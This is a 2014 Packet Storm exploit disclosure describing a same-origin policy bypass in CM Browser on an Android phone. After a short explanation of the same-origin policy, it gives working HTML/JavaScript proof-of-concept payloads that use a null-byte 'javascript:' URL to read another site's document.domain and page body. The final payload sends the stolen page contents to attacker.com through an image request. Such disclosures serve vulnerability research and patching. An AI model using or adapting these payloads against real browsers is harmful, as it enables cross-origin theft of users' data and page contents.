exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CM Browser SOP Bypass

CM Browser SOP Bypass
Posted Sep 16, 2014
Authored by Rafay Baloch

The CM browser suffers from a same-origin bypass vulnerability.

tags | exploit, bypass
SHA-256 | cb90f770b05e8da7d463a807bfd4d9059503a0f35122054dd9d80e1817d37c57

CM Browser SOP Bypass

Change Mirror Download
#Vulnerability: CM Browser Same Origin Policy Bypass
#Impact: High/Critical
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: http://rhainfosec.com & http://rafayhackingarticles.net

*Introduction*


Same Origin Policy (SOP) is one of the most important security mechanisms
that are applied in modern browsers, the basic idea behind the SOP is the
javaScript from one origin should not be able to access the properties of a
website on another origin. The origin is formed by the combination of
Scheme, domain and port with the port being an exception to IE. There are
some exceptions with SOP such the location property, objects wtih src
attribute. However, the fundamental are that different origins should not
be able to access the properties of one another.


*SOP Bypass*


A SOP bypass occurs when a sitea.com is some how able to access the
properties of siteb.com such as cookies, location, response etc. Due to the
nature of the issue and potential impact, this is very rarely found in
modern browsers. However, they are found once in a while. The following
writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20
with CM browser latest version.

The following is a proof of concept:


*Proof Of Concept *


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.domain)','test')" >


As you can see that the code tries accessing the document.domain property
of a site loaded into an iframe. If you run the POC at attacker.com on any
of the modern browsers, it would return a similar error as attacker.com
should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with
origin "http://www.rhainfosec.com". Protocols, domains, and ports must
match.

1. vagugebiweja:7


However, running it on any of the vulnerable smart phones default browsers
would alert the document.domain property indicating that the SOP was not
able to restrict the access to document.domain property of a site at a
different origin.


I created the following POC, so you can mess around with some stuff:


*Reading the response*


You can read the response of any page by accessing the
document.body.innerHTML property.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"
>


*Stealing the response and sending it to an attackers domain*


In real world situation an attacker would send the response to his
controlled domain.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:var i=new Image();i.src='//
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);
','test')"
>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close